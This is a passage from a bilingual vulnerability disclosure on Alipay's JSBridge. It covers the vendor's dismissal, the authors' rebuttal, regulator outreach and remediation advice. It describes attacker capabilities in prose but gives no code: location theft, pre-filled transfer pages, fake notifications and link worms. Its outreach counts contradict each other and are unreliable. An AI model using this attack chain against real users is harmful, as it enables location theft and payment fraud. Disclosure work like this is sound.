<td><code>getLocation</code></td>
<td style="color:#44cc88">
<span class="zh">checkJSAPI 不可用</span><span class="en">checkJSAPI N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">定位窃取</span><span class="en">Location theft</span>
</td>
</tr>
</table>
<div class="callout">
<p>
<span class="zh"><strong>蠕虫风险</strong>iOS 上的 <code>share</code> API 意味着攻击者页面可以自动将恶意链接分享到微信、QQ、短信、钉钉等平台实现自我传播。一个受害者点击链接 → 恶意链接自动分享给其联系人 → 指数级传播。</span>
<span class="en"><strong>Worm Risk</strong>: The <code>share</code> API on iOS means the attacker page can automatically share the malicious link to WeChat, QQ, SMS, DingTalk, etc. One victim clicks → malicious link auto-shared to contacts → exponential propagation.</span>
</p>
</div>
</section>
<!-- ==================== 8. WORKING DEFENSES ==================== -->
<section id="defense">
<h2><span class="num">08</span>
<span class="zh">已生效的防护</span>
<span class="en">Working Defenses</span>
</h2>
<div class="zh">
<p>客观地说,支付宝的安全架构确实有部分防护措施正在生效。以下 API 在外部域名下被正确拦截(返回 <code>permission denied</code></p>
</div>
<div class="en">
<p>To be objective, Alipay's security architecture does have some working defensive measures. The following APIs are correctly blocked from external domains (returning <code>permission denied</code>):</p>
</div>
<ul>
<li><code>clipboard</code> <span class="zh">读写</span><span class="en">read/write</span></li>
<li><code>getUserInfo</code></li>
<li><code>rpc</code> (<span class="zh">后端 RPC 调用</span><span class="en">backend RPC calls</span>)</li>
<li><code>httpRequest</code> (bridge-level)</li>
<li><code>openInBrowser</code></li>
<li><code>sendSMS</code> (<span class="zh">实际发送被拦截</span><span class="en">actual sending blocked</span>)</li>
<li><code>makePhoneCall</code></li>
</ul>
<div class="zh">
<p>这说明支付宝<strong>有能力</strong>在 JSBridge 层面实施域名白名单和权限控制。上述 17 个问题中涉及的 API 只是<strong>还没有被加入到同样的权限控制机制中</strong></p>
</div>
<div class="en">
<p>This demonstrates that Alipay <strong>has the capability</strong> to implement domain whitelisting and permission controls at the JSBridge level. The APIs involved in the 17 issues above simply <strong>haven't been added to the same permission control mechanism yet</strong>.</p>
</div>
</section>
<!-- ==================== 9. VENDOR RESPONSE ==================== -->
<section id="vendor">
<h2><span class="num">09</span>
<span class="zh">厂商回应与讨论</span>
<span class="en">Vendor Response & Discussion</span>
</h2>
<div class="callout vendor">
<p>
<span class="zh"><strong>蚂蚁集团的回应2026-03-10</strong>:所报告的内容是"支付宝的正常功能",不认为是安全漏洞。</span>
<span class="en"><strong>Ant Group's Response (2026-03-10)</strong>: The reported issues are "normal functionality of Alipay," not considered security vulnerabilities.</span>
</p>
</div>
<div class="zh">
<h3>我们的回应</h3>
<p>我们充分尊重厂商的判断。但以下事实不会因为判定结论而改变:</p>
<ol>
<li><strong>数据确实外传了。</strong> 308条服务器日志不是模拟的GPS 坐标(指向槟城市区)确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>转账页面确实被外部触发了。</strong> <code>startApp</code> 返回 <code>success: true</code>,转账页面确实打开了,攻击者的账号确实被预填了。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>用户没有被充分告知。</strong> "继续访问"警告中<strong>没有</strong>告诉用户"该网站将获得调用支付宝内部API的能力包括读取您的GPS位置、打开转账页面等"。用户不知道点击"继续访问"意味着什么。</li>
<li><strong>防护机制的不一致性。</strong> 既然 <code>clipboard</code><code>getUserInfo</code> 被正确拦截了,那 <code>getLocation</code><code>startApp</code> 为什么不需要同样的保护同一个安全框架对不同API的处理方式不一致这至少说明有改进空间。</li>
<li><strong>测试账户被封锁。</strong> 如果这些都是"正常功能",那为什么我们的测试账户在使用这些"正常功能"时触发了风控?这本身就说明系统认为这些行为是异常的。</li>
<li><strong>公开讨论的权利。</strong> 既然官方确认这些不是安全漏洞而是"正常功能",那我们讨论支付宝"正常功能"的安全影响,应该没有任何问题。</li>
</ol>
<p>我们发表这篇技术分析,不是为了争论"是不是漏洞"。<strong>我们只是在公开描述一个事实攻击者可以通过一个链接在不需要用户理解其后果的情况下从支付宝中获取GPS定位、打开转账页面、显示假通知。</strong>读者可以自行判断这是否是一个值得关注的安全问题。</p>
<div class="callout info" style="margin-top: 20px;">
<p><strong>重要澄清</strong>:本文所有描述的攻击链均<strong>无法</strong>实现"零交互自动转账/扣款"。转账操作最终仍需用户主动点击确认按钮。我们讨论的核心风险是在UI欺骗 + 社会工程 + 预填信息的组合攻击下,用户做出错误操作的概率被大幅提高。我们严格区分"页面成功跳转"和"资金操作完成",不做任何夸大。</p>
</div>
</div>
<div class="en">
<h3>Our Response</h3>
<p>We fully respect the vendor's judgment. However, the following facts do not change based on the classification decision:</p>
<ol>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates (pointing to Penang urban area) were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>The transfer page was indeed triggered externally.</strong> <code>startApp</code> returned <code>success: true</code>, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of the classification.</li>
<li><strong>Users are not adequately informed.</strong> The "Continue to visit" warning does <strong>not</strong> tell users: "This website will gain the ability to call Alipay internal APIs, including reading your GPS location, opening transfer pages, etc." Users don't know what clicking "Continue" means.</li>
<li><strong>Defense mechanism inconsistency.</strong> If <code>clipboard</code> and <code>getUserInfo</code> are correctly blocked, why don't <code>getLocation</code> and <code>startApp</code> receive the same protection? The inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.</li>
<li><strong>Test account was banned.</strong> If these are all "normal features," why did our test account trigger risk controls when using these "normal features"? This itself indicates the system considers these behaviors abnormal.</li>
<li><strong>Right to public discussion.</strong> Since the vendor officially confirmed these are not security vulnerabilities but "normal features," discussing the security implications of Alipay's "normal features" should be entirely appropriate.</li>
</ol>
<p>We publish this technical analysis not to argue about whether something is a "vulnerability." <strong>We are simply publicly describing a fact: an attacker can, through a single link, obtain GPS location from Alipay, open transfer pages, and display fake notifications — without the user understanding the consequences.</strong> Readers can judge for themselves whether this is a security concern worth attention.</p>
<div class="callout info" style="margin-top: 20px;">
<p><strong>Important Clarification</strong>: None of the attack chains described in this article can achieve "zero-interaction automatic transfers/debits." Fund transfers still require the user to actively tap the confirmation button. The core risk we discuss is: under the combined attack of UI spoofing + social engineering + pre-filled information, the probability of users making erroneous operations is significantly increased. We strictly distinguish between "page navigation succeeded" and "fund operation completed," and make no exaggerations.</p>
</div>
</div>
</section>
<!-- ==================== 9.5 GLOBAL REGULATORY RESPONSE ==================== -->
<section id="global-response">
<h2><span class="num">10</span>
<span class="zh">全球监管机构响应</span>
<span class="en">Global Regulatory Response</span>
</h2>
<div class="callout" style="border-color: var(--green); background: rgba(68,204,136,.06);">
<p>
<span class="zh"><strong>截至 2026-03-17</strong>:我们已向全球 40+ 个国家/地区的 300+ 个监管机构、CERT、隐私保护组织、媒体和安全社区发送了 649 封安全通报邮件。<strong>41个机构/平台已正式回复</strong>。以下是已收到明确受理结果的机构汇总。</span>
<span class="en"><strong>As of 2026-03-17</strong>: We have sent 649 security notification emails to 300+ regulatory bodies, CERTs, privacy authorities, media outlets, and security communities across 40+ countries/regions. <strong>41 institutions/platforms have formally responded</strong>. Below is a summary.</span>
</p>
</div>
<div class="zh">
<h3 style="color: var(--accent); margin-top: 24px;">一、正式调查/立案 (7个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">状态</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">关键信息</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA 香港金融管理局</strong></td>
<td style="padding:8px 12px;">🇭🇰 香港</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正式投诉立案</strong></td>
<td style="padding:8px 12px;">零售支付监管处高级主任受理SVF储值支付工具牌照持有人正式投诉表格已提交7日确认窗口</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC 新加坡个人数据保护委员会</strong></td>
<td style="padding:8px 12px;">🇸🇬 新加坡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正在调查</strong></td>
<td style="padding:8px 12px;">隐私保护委员会正式立案调查</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>转交调查团队</strong></td>
<td style="padding:8px 12px;">Apple 产品安全团队人工回复确认,已将报告转发给专门调查团队,正在调查 Alipay iOS 端 JSBridge 暴露的高危 API</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>政策违规调查</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action"</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>36个CVE待分配 (11 tickets)</strong></td>
<td style="padding:8px 12px;">通过 CNA-LR 路径提交36个CVE请求11个MITRE tickets全部已确认收到</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF 卢森堡金融监管委员会</strong></td>
<td style="padding:8px 12px;">🇱🇺 卢森堡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing立案 + ICT Risk确认</strong></td>
<td style="padding:8px 12px;">4个部门/通道确认收到Whistleblowing团队立案 + ICT Risk Supervision 人工确认×2 + Reclamation确认ICT风险监管部门明确表示"已知悉报告内容",已提交补充证据(联动 2025 年反洗钱处罚记录)</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--green);"><strong>已公开发布</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a> — "Alipay Open Redirect / API Attacker Payload Insertion"</td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">二、确认收到并转交/处理中 (11个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">回复内容</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL 卢森堡CERT</strong></td><td style="padding:8px 12px;">🇱🇺 卢森堡</td><td style="padding:8px 12px;">事件处理分析师人工回复,<strong>已代我们联系 Alibaba Security Response Center</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR 法国</strong></td><td style="padding:8px 12px;">🇫🇷 法国</td><td style="padding:8px 12px;">"已转交相关部门处理,将尽快回复"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT 香港</strong></td><td style="padding:8px 12px;">🇭🇰 香港</td><td style="padding:8px 12px;"><strong>已正式转交CNCERT</strong>(中国国家互联网应急中心)</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA 新西兰金融管理局</strong></td><td style="padding:8px 12px;">🇳🇿 新西兰</td><td style="padding:8px 12px;">"信息已记录,正在考虑是否对 Alipay 采取进一步行动"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA 英国金融行为监管局</strong></td><td style="padding:8px 12px;">🇬🇧 英国</td><td style="padding:8px 12px;">Whistleblowing 团队确认收到,正在审查(涉及 AIUK Services Limited, 原 Alipay UK Ltd</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB 荷兰央行</strong></td><td style="padding:8px 12px;">🇳🇱 荷兰</td><td style="padding:8px 12px;">Cyber Defense Center 确认收到,引导至监管通道处理</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK 印尼金融监管局</strong></td><td style="padding:8px 12px;">🇮🇩 印尼</td><td style="padding:8px 12px;">要求补充详细说明,已回复完整技术报告</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC 澳大利亚信息专员</strong></td><td style="padding:8px 12px;">🇦🇺 澳大利亚</td><td style="padding:8px 12px;">Intake 团队确认收到投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB 欧盟数据保护委员会</strong></td><td style="padding:8px 12px;">🇪🇺 欧盟</td><td style="padding:8px 12px;">确认收到跨境数据保护投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT 泰国</strong></td><td style="padding:8px 12px;">🇹🇭 泰国</td><td style="padding:8px 12px;">"已转交负责人"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM 马来西亚央行</strong></td><td style="padding:8px 12px;">🇲🇾 马来西亚</td><td style="padding:8px 12px;">工单确认收到</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">三、自动确认/模板回复 (8个)</h3>
<p>BSP 菲律宾央行、OSFI 加拿大金融监管、Privacy International、ProPublica、CNA/Mediacorp 新加坡、Datatilsynet 丹麦数据保护、DSB 奥地利数据保护、IMY 瑞典数据保护。</p>
<h3 style="margin-top: 24px;">情况概述</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>总发送 <strong>~189 封</strong>,覆盖 <strong>22 个国家/地区</strong>,约 160 个目标</li>
<li>送达率 <strong>~90%</strong>(退信经过 4 轮修正补发)</li>
<li>收到回复 <strong>39+ 个</strong>(回复率 ~23%</li>
<li><strong>7 个正式调查/立案</strong>HKMA、PDPC、Apple、Google、MITRE、CSSF、Packet Storm</li>
<li><strong>CIRCL 卢森堡国家CERT</strong> 主动代我们联系 Alibaba Security Response Center</li>
<li><strong>HKCERT → CNCERT</strong>:唯一能直接触达中国大陆实体的监管路径已启动</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>注:为保护正在进行中的调查程序,部分案件编号和联系人邮箱已脱敏。本表将随调查进展持续更新。</em></p>
</div>
<div class="en">
<h3 style="color: var(--accent); margin-top: 24px;">I. Formal Investigations / Case Filed (7)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Status</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Key Information</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA (Hong Kong Monetary Authority)</strong></td>
<td style="padding:8px 12px;">🇭🇰 Hong Kong</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Formal Complaint Filed</strong></td>
<td style="padding:8px 12px;">Assigned to Senior Officer at Retail Payment Oversight Division. SVF licensee complaint form submitted.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC (Personal Data Protection Commission)</strong></td>
<td style="padding:8px 12px;">🇸🇬 Singapore</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Under Investigation</strong></td>
<td style="padding:8px 12px;">Formal investigation case opened.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Forwarded to Investigation Team</strong></td>
<td style="padding:8px 12px;">Human response from Product Security confirming report forwarded to investigation team. Investigating high-risk JSBridge APIs exposed on Alipay iOS.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Policy Violation Investigation</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action."</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>36 CVEs Pending Assignment (11 tickets)</strong></td>
<td style="padding:8px 12px;">36 CVE requests submitted via CNA-LR pathway across 11 MITRE tickets. All receipts confirmed.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF (Luxembourg Financial Regulator)</strong></td>
<td style="padding:8px 12px;">🇱🇺 Luxembourg</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing Case + ICT Risk Confirmed</strong></td>
<td style="padding:8px 12px;">4 departments/channels acknowledged (Whistleblowing case filed + ICT Risk Supervision confirmed ×2 + Reclamation confirmed). ICT Risk Supervision explicitly stated they "take note of the contents." Supplementary evidence submitted linking to 2025 AML penalty.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--green);"><strong>Published</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a></td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">II. Acknowledged & Transferred (11)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Response</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL (National CERT Luxembourg)</strong></td><td style="padding:8px 12px;">🇱🇺</td><td style="padding:8px 12px;">Incident handler responded personally. <strong>Contacted Alibaba SRC on our behalf.</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR</strong></td><td style="padding:8px 12px;">🇫🇷</td><td style="padding:8px 12px;">"Forwarded to the appropriate department."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT</strong></td><td style="padding:8px 12px;">🇭🇰</td><td style="padding:8px 12px;"><strong>Forwarded to CNCERT</strong> (China's National CERT).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA</strong></td><td style="padding:8px 12px;">🇳🇿</td><td style="padding:8px 12px;">"Considering whether to take further action."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA</strong></td><td style="padding:8px 12px;">🇬🇧</td><td style="padding:8px 12px;">Whistleblowing team reviewing (AIUK Services Ltd, formerly Alipay UK Ltd).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB</strong></td><td style="padding:8px 12px;">🇳🇱</td><td style="padding:8px 12px;">Cyber Defense Center acknowledged, routed to supervisory channel.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK</strong></td><td style="padding:8px 12px;">🇮🇩</td><td style="padding:8px 12px;">Requested details. Full technical report provided.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC</strong></td><td style="padding:8px 12px;">🇦🇺</td><td style="padding:8px 12px;">Intake team confirmed receipt.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB</strong></td><td style="padding:8px 12px;">🇪🇺</td><td style="padding:8px 12px;">Acknowledged cross-border data protection complaint.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT</strong></td><td style="padding:8px 12px;">🇹🇭</td><td style="padding:8px 12px;">"Forwarded to the responsible person."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM</strong></td><td style="padding:8px 12px;">🇲🇾</td><td style="padding:8px 12px;">Ticket acknowledged.</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">III. Auto-Acknowledgments (8)</h3>
<p>BSP (Philippines), OSFI (Canada), Privacy International, ProPublica (USA), CNA/Mediacorp (Singapore), Datatilsynet (Denmark), DSB (Austria), IMY (Sweden).</p>
<h3 style="margin-top: 24px;">Overview</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>Total sent: <strong>~189 emails</strong> across <strong>22 countries/regions</strong>, ~160 targets</li>
<li>Delivery rate: <strong>~90%</strong> (bounces corrected through 4 rounds)</li>
<li>Responses: <strong>39+</strong> (~23% response rate)</li>
<li><strong>7 formal investigations</strong>: HKMA, PDPC, Apple, Google, MITRE, CSSF, Packet Storm</li>
<li><strong>CIRCL</strong> proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKCERT → CNCERT</strong>: The only pathway to mainland China entities activated</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>Note: To protect ongoing investigations, certain case reference numbers and contact emails have been redacted. This table will be updated as investigations progress.</em></p>
</div>
<!-- ITIF Independent Corroboration -->
<div class="callout" style="border-color: var(--blue); background: rgba(68,136,255,.06); margin-top:20px;">
<h3 style="color:var(--blue);margin:0 0 10px 0;">
<span class="zh">独立佐证:美国顶级科技政策智库的平行评估</span>
<span class="en">Independent Corroboration: Parallel Assessment by Top US Tech Policy Think Tank</span>
</h3>
<div class="zh">
<p>2026年3月6日——<strong>早于我们公开披露5天</strong>——<a href="https://itif.org/publications/2026/03/06/alipay-presents-real-risks-but-dont-rush-to-ban-it/" target="_blank">美国信息技术与创新基金会 (ITIF)</a> 发表文章 <em>"Alipay Presents Real Risks — But Don't Rush to Ban It"</em></p>
<p>ITIF 被宾夕法尼亚大学评为<strong>全球最权威的科技政策智库</strong>。文章独立指出支付宝收集"购买记录、设备位置、身份证件、健康数据和生物特征标记",并呼吁 FTC 和 CFPB 对支付宝进行数据审计。文章还引用中国《国家情报法》第7条指出中国政府可合法要求企业提交所收集的数据。</p>
<p>这一完全独立的评估与我们的技术发现高度一致:<strong>当白名单绕过允许任意攻击者获取支付宝用户的GPS和设备信息时数据主权风险被进一步放大</strong></p>
</div>
<div class="en">
<p>On March 6, 2026 — <strong>5 days before our public disclosure</strong> — the <a href="https://itif.org/publications/2026/03/06/alipay-presents-real-risks-but-dont-rush-to-ban-it/" target="_blank">Information Technology & Innovation Foundation (ITIF)</a> published <em>"Alipay Presents Real Risks — But Don't Rush to Ban It."</em></p>
<p>ITIF is ranked by the University of Pennsylvania as the <strong>world's most authoritative science and technology policy think tank</strong>. The article independently identifies Alipay as collecting "purchase histories, device locations, government IDs, health data, and biometric markers," and calls for FTC and CFPB audits. It cites China's National Intelligence Law Article 7, noting the government can legally compel companies to share collected data.</p>
<p>This entirely independent assessment is highly consistent with our technical findings: <strong>when a whitelist bypass allows arbitrary attackers to obtain users' GPS and device information, data sovereignty risks are amplified further</strong>.</p>
</div>
</div>
</section>
<!-- ==================== 10. RECOMMENDATIONS ==================== -->
<section id="recommendations">
<h2><span class="num">10</span>
<span class="zh">修复建议</span>
<span class="en">Remediation Recommendations</span>
</h2>
<div class="zh">
<p>尽管厂商将这些归类为"正常功能",我们仍然提供以下技术建议以供参考:</p>
</div>
<div class="en">
<p>Despite the vendor classifying these as "normal features," we still offer the following technical recommendations for consideration:</p>
</div>
<table>
<tr>
<th>#</th>
<th>
<span class="zh">建议</span><span class="en">Recommendation</span>
</th>
<th>
<span class="zh">覆盖问题</span><span class="en">Addresses</span>
</th>
</tr>
<tr>
<td>1</td>
<td>
<span class="zh"><strong>JSBridge 域名白名单</strong>:非阿里巴巴域名禁止调用 <code>startApp</code><code>pushWindow</code><code>tradePay</code><code>getLocation</code></span>
<span class="en"><strong>JSBridge domain whitelist</strong>: Block <code>startApp</code>, <code>pushWindow</code>, <code>tradePay</code>, <code>getLocation</code> for non-Alibaba domains</span>
</td>
<td>V-01~V-07</td>
</tr>
<tr>
<td>2</td>
<td>
<span class="zh"><strong>startApp 参数过滤</strong>:外部页面调用 <code>startApp</code> 时禁止传递 <code>param</code>(预填账号/金额)</span>
<span class="en"><strong>startApp parameter filtering</strong>: Block <code>param</code> passing (pre-fill account/amount) when called from external pages</span>
</td>
<td>V-01, V-02</td>
</tr>
<tr>
<td>3</td>
<td>
<span class="zh"><strong>pushWindow URL 限制</strong>:禁止 <code>pushWindow</code> 加载 <code>alipays://</code> scheme 和内部 URL</span>
<span class="en"><strong>pushWindow URL restriction</strong>: Block <code>pushWindow</code> from loading <code>alipays://</code> schemes and internal URLs</span>
</td>
<td>V-02, V-03, V-12</td>
</tr>
<tr>
<td>4</td>
<td>
<span class="zh"><strong>tradePay 来源校验</strong><code>tradePay</code> 必须验证调用来源为受信任的 H5 应用</span>
<span class="en"><strong>tradePay source validation</strong>: <code>tradePay</code> must verify calling source is a trusted H5 app</span>
</td>
<td>V-04</td>
</tr>
<tr>
<td>5</td>
<td>
<span class="zh"><strong>getLocation 权限弹窗</strong>:外部页面调用时必须显示用户确认弹窗</span>
<span class="en"><strong>getLocation permission dialog</strong>: Must show user consent dialog when called from external pages</span>
</td>
<td>V-07</td>
</tr>
<tr>
<td>6</td>
<td>
<span class="zh"><strong>DeepLink 敏感页面保护</strong>:敏感功能的 DeepLink 需验证调用来源或要求二次确认</span>
<span class="en"><strong>DeepLink sensitive page protection</strong>: Sensitive function DeepLinks should verify calling source or require secondary confirmation</span>
</td>
<td>V-06, V-10, V-11</td>
</tr>
<tr>
<td>7</td>
<td>
<span class="zh"><strong>UI 欺骗防护</strong>:外部页面禁止调用 <code>toast</code><code>setTitle</code></span>
<span class="en"><strong>UI spoofing protection</strong>: Block <code>toast</code>, <code>setTitle</code> from external pages</span>
</td>
<td>V-08</td>
</tr>
<tr>
<td>8</td>
<td>
<span class="zh"><strong>"继续访问"警告增强</strong>:明确告知用户外部页面将获得的 API 权限</span>
<span class="en"><strong>Enhanced "Continue" warning</strong>: Explicitly inform users of the API permissions the external page will gain</span>
</td>
<td>All</td>
</tr>
<tr>
<td>9</td>
<td>
<span class="zh"><strong>数据外传防护</strong>WebView 内 XHR/Image 请求检查目标域名</span>
<span class="en"><strong>Data exfiltration prevention</strong>: Check target domain for XHR/Image requests within WebView</span>
</td>
<td>V-05, V-15~V-17</td>
</tr>
</table>
</section>
<!-- ==================== USER DEFENSE GUIDE ==================== -->
<section id="user-defense">
<h2><span class="num">🛡️</span>
<span class="zh">用户自我保护指南</span>
<span class="en">User Self-Protection Guide</span>
</h2>
<div class="zh">
<p>在厂商修复这些问题之前,普通用户可以采取以下措施降低风险:</p>
</div>
<div class="en">
<p>Until the vendor addresses these issues, ordinary users can take the following steps to reduce risk:</p>
</div>
<table>
<tr>
<th>#</th>
<th><span class="zh">措施</span><span class="en">Measure</span></th>
